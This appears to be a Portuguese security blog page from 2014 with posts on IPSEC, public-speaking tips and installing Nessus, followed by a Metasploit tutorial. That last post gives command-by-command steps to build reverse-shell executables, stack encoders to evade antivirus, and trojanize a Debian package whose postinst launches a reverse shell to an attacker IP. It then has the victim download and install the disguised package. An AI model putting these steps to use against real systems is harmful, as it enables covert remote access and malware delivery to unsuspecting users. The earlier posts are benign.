– root@injetionsec:~#

Protocolo IPSEC o que é ?

14.10.2014 (6:24 pm) – Filed under: Redes ::

IPSEC : caracteriza como uma segurança, pela qual opera na camada de rede introduzindo no cabeçalho de pacote IP números de protocolos adicionais possibilitando criptografar qualquer protocolo de camada superior, como TCP e UDP oferecendo flexibilidade para conexões TCP/IP criptografados.Uma das desvantagens do IPSEC é exigir suporte do sistema operacional, através do Kernel, pois alguns kernels não oferecem manipulação direta dos cabeçalhos IP,pode ser usado como transporte e túnel.

woodhdoifpng

O protocolo IPSEC, possibilita à implementação de um tunelamento na camada de rede (IP) como ja falamos, isso oferecendo uma forma de autenticação no nível de rede,possibilita a transmissão e integridade de dados com criptografia utilizando chaves de 128 bits. Neste caso, implementando um grau de segurança nas informações que circulam pela rede,alguns elementos principais fazem parte do protocolo IPSEC na proteção da comunicação de rede, como:

 * (AH) cabeçalho de autenticação: autentica e verifica a integridade dos dados. Este processo de autenticação impede a recepção sem autorização em computadores evitando tipos de falsificação e alterações das informações nas rotas de comunicações. Ele não criptografa os dados, no entanto, sua principal característica é verificar a integridade no momento necessário.
 * (ESP) Carga de empacotamento: Possibilita um a forma de transporte segura, afim de evitar a interceptação, leitura e cópia dos dados que circulam por terceiros, ainda tem a missão de verificar a integridade
dos dados.

MODO TRANSPORTE:  apenas o segmento da camada de transporte é processado, autenticado e criptografado, pela qual o cabeçalho IPSEC é colocado logo após o cabeçalho IP. Neste caso, o campo do cabeçalho IP é modificado indicando que o cabeçalho IPSEC segue o cabeçalho normal do IP. O IPSEC possui no seu cabeçalho informações de segurança, como o identificador SA,número de sequência novo de parâmetros de verificação de carga,vemos abaixo a arquitetura do protocolo IPsec.

woodhdE0RIJWEng

No modo túnel, o pacote IP é autenticado ou criptografado, sendo que todo o pacote IP com o cabeçalho é encapsulado utilizando um novo corpo de um pacote IP com cabeçalho de IP totalmente novo. Isto torna-se necessário quando um túnel é finalizado em um local diferente do seu destino final ou quando as conexões TCP agregadas são tratadas como fluxo codificado único, evitando que terceiros desvendem qual parte está enviando ou recebendo e a quantidade de pacotes que trafegam na rede.

w78YWEng

O gerenciamento de chaves do protocolo IPSEC pode ser automático ou manual e isto depende do número de sites conectados.Atualmente, o protocolo IPSEC oferece uma das melhores oportunidades de implementação de segurança envolvendo proteção de tráfego sobre rede IP,pela qual consolida segurança as VPNs, bem como possibilita projetos de segurança em qualquer ambiente que as informações estejam expostas.

É isso ai galera =)

Dicas de apresentação em público

13.10.2014 (3:00 pm) – Filed under: Dicas ::

Quem nunca se sentiu desconfortável ao apresentar pela primeira vez uma palestra,dar aula ou afins,temos casos de varias pessoas que não se sente bem ao se apresentar em público, para isso segue algumas dicas:

– Saiba o conteúdo;

– Defina e conceitue;

– Apresente os pros e os contras;

– Enalteça os prós;

– Refute os contras;

– Apresente uma conclusão lógica e emita sua opnião;

– Não tenha vícios de linguagem ou vocabularios errados;

– Estimulem a intereção do publico; como a perguntar,situações vividas por você e etc;

– Não se preocupe com publico,coisas externas e etc;

– Meus ouvintes estão entendendo sobre que estou falando,estou realmente focado com conteudo da palestra;

– Trocas de olhares merece atenção,não escolha 1 ou 2 pessoas, divida a plateia em 4 ou 5 grupos, demonstre respeito e calma;

– Não decifre gestos da plateia:
__* se 2 pessoas não estão entendendo não se assuste/apavore por conta disso
__* agora se você perceber que a maioria não esta entendo nada, tente reverter isso.

– Forme em sua cabeça os aspectos mais relevantes como diagrama de palavras mais importantes da palestra.

– Ensae em algum lugar de preferencia com movimento para treinar.

– Respiração e essencial controle esse quesito;

– Cuidado com a ansiedade(pernas paralelas e mãos para traz),pode falar com uma breve apresentação de si mesmo e seu envolvimento do tema em si,conquiste a confiança do ouvintes,você tera uma apresentação melhor;

– Seja natural,flexivel,sorrir,utilize a sua fala normal.

– Conheça suas limitações assim vai conhecer seu pontos fracos
__* realize apresentações preliminares para conhecidos,namorada(o),amiga(o)s é peça um feedback
__* de destaque a aquilo que você sabe bem =)
– Conheça seu publico,local, ninguem gosta de atrasos,pergunte se tem equipamento disponiveis para evitar cntratempos;

– Foco da apresentação será o discurso,peças confortaveis,cuidados com roupas;

– Silêncio nem sempre e despreparação durante a sua apresentação,pausas estrategicas ajuda na apresentação;

– Não importa onde esteja respeite a opnião dos outros.
__* se durante a apresentação um participante surgir com uma opnião que faz sentido faça da seguinte forma:
______+ agradeça-o “muito obrigado pela opnião não tinha pensado desse angulo”

– Quer conquistar os ouvintes, quando fizer uma pergunta que não sabe responder, demostre á posição de que quer aprender;

– Em que realmente você é bom ? .. audiovisual,humor,alguma ferramenta diferente,contar boas historias,se souber tirar risadas do publico é interessante,mas não abuse;

– se não tem experiencia de falar em publico, convide alguém critico para ver sua apresentação isso diminui sua ansiedade e você tera mais certeza do que vai falar ao certo no dia da apresentação;

– Evite falar depressa,destaque os pontos mais importantes da sua apresentação;

– Não á nenhum problema em errar, não potencialize seus erros não deixe que isso acontece com você, peça desculpa e continue, se tiver em um ambiente não muito formal faça um humor com seu erro;

– Para se tornar um ambiente agradavel pode-se
__* realizar brincadeiras
__* atividades dinâmicas
__* citar pensamentos
__* dialogo com interlocutores

– PREPARAÇÃO CONTINUA E SEMPRE BOM,NUNCA SE SABE QUANDO TEMOS QUE FALAR EM PUBLICO OU APRESENTAÇÕES DE EMERGÊNCIA;
– Não se intimide com publico, não se deixe enganar, cite alguns autores renomados durante a apresentação,sempre de forma educada e respeitando as opniões das pessoas;

– Observe o tempo da sua apresentação, planeje se o tempo de apresentação e de 30 mim, programe para 20mim ou 25mim isso e pelo fato de que á contratempos;

– Planejamento detalhado da sua apresentação,isso evita sustos, perda de foco o legal e contruir um mapa mental de sua apresentação dos topicos principais;

– Linguagem corporal é importante :
__* as mãos sempre em frente ao corpo gesticulando entre o queixo o corpo

– Envolva os participantes, conte uma historia interessante, ou uma citação interessante;

– FINALIZE A PALESTRA COM UMA PERGUNTA QUE INSPIRE REFLEXÃO,os ouvintes saíram da palestra pensando em você;

– GENTILEZA + SIMPATIA pense nisso nas apresentações,palestra,aula e etc;

– Se quiser aprofundar mais nesses quesitos procure um profissonal de comunicação;

Até a próxima =)

Instalando o nessus

07.10.2014 (2:37 pm) – Filed under: Pentest ::

Nessus é um scanner de vulnerabilidades poderoso. Infelizmente, desde a versão 3, o Nessus não é mais um software Open Source,vamos ter que baixa-lo diretamente do site oficial é logo depois registra.

1o – instalando o pacote .deb
dpkg-i Nessus-4.4.1-ubuntu910_i386.deb
Se quiser, você pode depois dessa instalação passar para a etapa 3o e 5o; logo em seguida você vera as instruções de instalação,download e código.

2o – No terminal digite para add o usuário
/opt/nessus/sbin/nessus-adduser

3o – startamos o nessus
/etc/init.d/nessusd start

dsdifjds

4o – registrar o codigo fornecido no email
/opt/nessus/bin/nessus-fetch –register [seu código]
** dois traços antes do register

wiue

5o- depois e só entrar em seu navegado,esperar o processo de install e assim logar
https://localhost:8834/

Ate o próximo tópico galera =]

Comandos do metasploit – part 4

06.10.2014 (5:23 pm) – Filed under: Pentest ::

Veja :

comandos do metasploit – parte 1
comandos do metasploit – parte 2
comandos do metasploit – parte 3

Galera,continuando a nossa séria de posts de metasploit, vejam:

Serviço de indentificação : o nmap realiza o scanner de varios serviços na rede destino,temos também uma veriedade de scanner para
determinados serviços e objetivos no metasploit

msf > search auxiliary ^scanner

Nessus no msfconsole: tem aquelas situações que optamos por usar linha de comando utilizando o nessus diretamente no metasploit, o
nessus e um scanner de vulnerabilidade

msf > load nessus
msf > nessus_help

Startamos o nessus e depois podemos ver os plugins instaldos no comando acima “nessus_help”, percebemos que o nessus e bastante
completo,Para ver as políticas de exploração que está disponivel utilizamos o seguinte comando “nessus_policy_list”

msf > nessus_policy_list

Fuzzer : e uma ferramenta utilizada por profissionais de segurança para para ver se os dados são validos e se tem algum aviso de
entrada valida no programa, e muito utilizado em buffer overflow,ataques de diretorio transversal,vulnerabilidade web de injecção,como
xss,slqi, e muitas outras, o metasploit ofere um modulo para essas tarefas
Binarios, payloads : uma das capacidades do metasploit e gerar um executavel a partir de um payload, isto e muito util nos casos de
engenharia social onde podemos conseguir executar esse payload se passando por um software autentico,vamos gerar um payload de shell
inverso para conseguir acesso remoto ao sistema, vamos utilizar o “msfpayload” este comando ira gerar cargas para ser usado em um
serie de variedades de ataques,veja os comandos

root@bt:# msfpayload windows/shell_reverse_tcp O
root@bt:# msfpayload windows/shell_reverse_tcp LHOST=[SEU IP] LPORT=31337 O
root@bt:# msfpayload windows/shell_reverse_tcp LHOST=192.102.12.2 LPORT=31337 X > /tmp/progr.exe

Agora temos um executavel para funcionar no windows, vamos agora usar o “multi/handler”

msf > use exploit/multi/handler
msf exploit(handler) > show options
Quando se utiliza o modulo “exploit/multi/handler” temos que direcinar um payload para assim injetar

msf exploit(handler) > set payload windows/shell/reverse_tcp
msf exploit(handler) > show options
msf exploit(handler) > set LHOST [SEU IP]
msf exploit(handler) > set LPORT 31337
msf exploit(handler) > exploit

Bypass em antivurus : muitos payload gerados nos metasploit podem baypass os antivirus, mas vemos que a maioria esta atualizada e um
pouco obsoleto,vamos codificar o nosso executavel produzido utilizando o comando como msfencode com a seguinte flag “-h” para vermos
os comandos

root@bt:/pentest/exploits/framework3# msfencode -h

Vamos ver qual codificadores podemos injetar com a seguinte flag “-l”

root@bt:/pentest/exploits/framework3# msfencode -l

Iremos então codificar o com o shikata_ga_nai em executaveis do windows

root@bt:/pentest/exploits/framework3# msfpayload windows/shell_reverse_tcp LHOST=192.102.12.2 LPORT=31337 R | msfencode -e
x86/shikata_ga_nai -t exe > /tmp/prog2.exe

Se formos verificar esse arquivos em scanner online de malware vemos o seguinte resultado

http://virusscan.jotti.org/pt-br/scanresult/e528fc54926dec35e3a1f60892ac07e5de9ec59c

Vamos então tentar usar 3 codificadores diferentes para com 10 vezes cada um,vamos ter um binario mais trabalhado vejamos o camando

root@bt:/pentest/exploits/framework3# msfpayload windows/shell_reverse_tcp LHOST=192.102.12.2 LPORT=31337 R | msfencode -e
x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t
exe > /tmp/prog2.exe

Podemos perceber que na maioria das vezes os antivurus com mais codificadores injetados podem ser sucessivel a encontrar algum binario
malicioso ou não, mas hoje a maioria

Para prosseguir com o ataque você pode mandar esse binario para o alvo e executa-lo, ja na maquina alvo execute o seguinte comando

root@bt:/pentest/exploits/framework3# msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.102.12.2 LPORT=31337 E

Criando trojan em linux : vamos descarregar um pacote para que possamos infecta-lo,vejam os comandos

root@bt:/pentest/exploits/framework3# apt-get –download-only install [qualquer pacote]
root@bt:/pentest/exploits/framework3# mkdir /tmp/pacote
root@bt:/pentest/exploits/framework3# mv /var/cache/apt/archives/[qualquer pacote].deb /tmp/pacote
root@bt:/pentest/exploits/framework3# cd /tmp/pacote
root@bt:/tmp/pacote

Vamos então extrair o pacote e criar um diretorio chamado DEBIAN para assim manter-mos as mesmas caracteristicas dele.

root@bt:/tmp/pacote# dpkg -x [qualquer pacote].deb work
root@bt:/tmp/pacote# mkdir work/DEBIAN

entramos no diretorio debian e criamos um arquivo “control” com as seguintes informações:

Package: nome do pacote
Version: 1.56-1
Section: Games
Priority: optional
Architecture: i386
Maintainer: Ubuntu Developers (ubuntu-dev@ubuntu.com)
Description: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

vamos criar também um script de pos instalação quando o binario for executado,chamado “posinstall”

root@bt:/tmp/evil/work/DEBIAN# nano postinst
#!/bin/sh
sudo chmod 2777 /usr/games/[nome do pacote] && /usr/games/[nome do pacote] & /usr/games/pacote &

Agora vamos criar um payload malicioso e uma shell inversa para conectar com nosso pacote

root@bt:/pentest/exploits/framework3# msfpayload linux/x86/shell/reverse_tcp LHOST=192.102.12.2 LPORT=443 X >
/tmp/evil/work/usr/games/freesweep_scores

Agora vamos executar nossa instalação e construção do novo pacote, esse arquivo se chamara “arq.deb” que vai se chamavar novamente com
o nome do arquivo original do pacote

root@bt:/tmp/pacote/work/DEBIAN# chmod 755 postinst
root@bt:/tmp/pacote/work/DEBIAN# dpkg-deb –build /tmp/evil/work
root@bt:/tmp/pacote# mv arq.deb nome do pacote original.deb
root@bt:/tmp/pacote# cp pacote original.deb /var/www/

Startamos o servidor apache

root@bt: /etc/init.d/apache2 start
root@bt:/pentest/exploits/framework3# msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.102.12.2 LPORT=443 E

Agora passamos o link para vitima baixar, apos isso a maquina alvo vai executar os seguintes comandos

ubuntu@server:~$ wget http://192.102.12.2/nome do pacote original.deb
ubuntu@server:~$ sudo dpkg -i nome do pacote original.deb

È isso ai galera fico por aqui, ate o próximo tópico.